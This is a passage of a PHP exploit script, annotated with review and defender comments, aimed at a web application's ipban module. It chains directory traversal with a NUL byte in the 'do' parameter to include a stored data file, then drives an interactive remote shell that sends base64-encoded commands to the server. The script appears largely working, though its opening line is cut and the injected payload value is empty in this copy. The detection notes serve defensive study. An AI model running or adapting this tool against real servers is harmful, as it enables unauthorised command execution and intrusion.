')) { return false; } else { return true; } }
// NOTE(review): the line above is the tail of a definition that begins outside
// this excerpt (it opens inside a string literal); it is left exactly as found.

/**
 * Sends a pre-built raw HTTP request to $host on TCP port 80 and returns
 * whatever text comes back on the socket.
 *
 * Nothing is parsed here: the status line, headers and body are returned as
 * read. A failed connection is silenced with @ and ends the script through
 * die() with a fixed message. No timeout argument is passed to fsockopen().
 *
 * @param string $host Host name or address handed to fsockopen().
 * @param string $data Complete request text, written to the socket verbatim.
 * @return string Text read from the socket until EOF.
 */
function send ($host,$data)
{
    if (!$sock = @fsockopen($host,80)) {
        die("Connection refused, try again!\n");
    }
    fputs($sock,$data);
    // Read line by line until the peer closes the connection.
    while (!feof($sock)) {
        $html .= fgets($sock);
    }
    fclose($sock);
    return $html;
}

/**
 * Sends one POST to {$path}example/index.php with a form body addressed to
 * the "ipban" module (action=add, mod=ipban).
 *
 * The `do` query parameter is a directory-traversal path that ends in a
 * URL-encoded NUL byte (../../../../../inc/mod/ipban.mdu%00). In this copy the
 * add_ip value is urlencode('') -- an empty string -- so the content submitted
 * to the ban form is not present on the page.
 *
 * Reads $host and $path from global scope. The response returned by send() is
 * discarded.
 *
 * Defender's view: the request is recognisable in access logs and at a WAF by
 * `../` sequences together with `%00` inside the `do` parameter. PHP 5.3.4 and
 * later refuse filesystem paths that contain a NUL byte; independent of the
 * PHP version, `do` should be resolved against a fixed allowlist of module
 * names rather than concatenated into a path.
 * NOTE(review): how the target application consumes `do` is not shown here;
 * the request shape implies it is used to build an include path -- confirm
 * against the application source.
 */
function post_shell()
{
    global $host,$path;
    // Form body; the add_ip value is empty in this copy.
    $post = "add_ip=" . urlencode('') . "&action=add&mod=ipban";
    // Request line: traversal path plus %00 in the `do` parameter.
    $data .= "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    // Content-Length counts $post only; the trailing CRLFs appended after the
    // body below are not included in that figure.
    $data .= "Content-Length: ".strlen($post)."\r\n\r\n";
    $data .= "$post\r\n\r\n";
    send ($host,$data);
}

/**
 * Interactive loop: prints a prompt, reads one line from STDIN, passes it to
 * exec_cmd() and prints the returned text.
 *
 * Never returns. The script ends through die() when the input is one of
 * exit, --exit, quit or --quit (matched case-insensitively).
 */
function use_shell()
{
    while (1) {
        echo "[Shell]~$: ";
        // Surrounding whitespace is trimmed first, then backslash escapes are removed.
        $cmd = stripslashes(trim(fgets(STDIN)));
        if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die("\nExited\n");
        print exec_cmd($cmd);
    }
}

/**
 * Base64-encodes $cmd, sends it in the `cmd` query parameter of a GET to
 * {$path}example/index.php, and returns the first regex capture taken from
 * the raw response.
 *
 * The `do` parameter again carries a traversal path ending in %00, this time
 * pointing at db/base/ipban.MYD. Reads $host and $path from global scope.
 *
 * Defender's view: the pairing to look for in web logs is a base64 value in
 * `cmd` on the same request as a `do` value containing `../` and `%00`,
 * typically after a POST to the ipban module from the same client. User-
 * supplied text that ends up in a file reachable through an include path is
 * the condition to remove on the server side.
 * NOTE(review): .MYD is the extension MySQL's MyISAM engine uses for table
 * data files; presumably this is the stored ipban table -- confirm.
 *
 * @param string $cmd Text read from the operator's STDIN by use_shell().
 * @return string First capture of the response pattern ($match[1][0]).
 */
function exec_cmd($cmd)
{
    global $host,$path;
    $cmd = base64_encode($cmd);
    $data .= "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    // Connection: close makes the server end the stream, which is what the
    // read-until-EOF loop in send() waits for.
    $data .= "Connection: close\r\n\r\n";
    $html = send ($host,$data);
    // Greedy capture with the s flag: everything in the raw response that
    // precedes the last closing code tag.
    // NOTE(review): an opening tag may have been lost from this pattern when
    // the page was extracted -- confirm against the original listing.
    preg_match_all('/(.*)<\/code>/si', $html, $match);
    return $match[1][0];
}
?>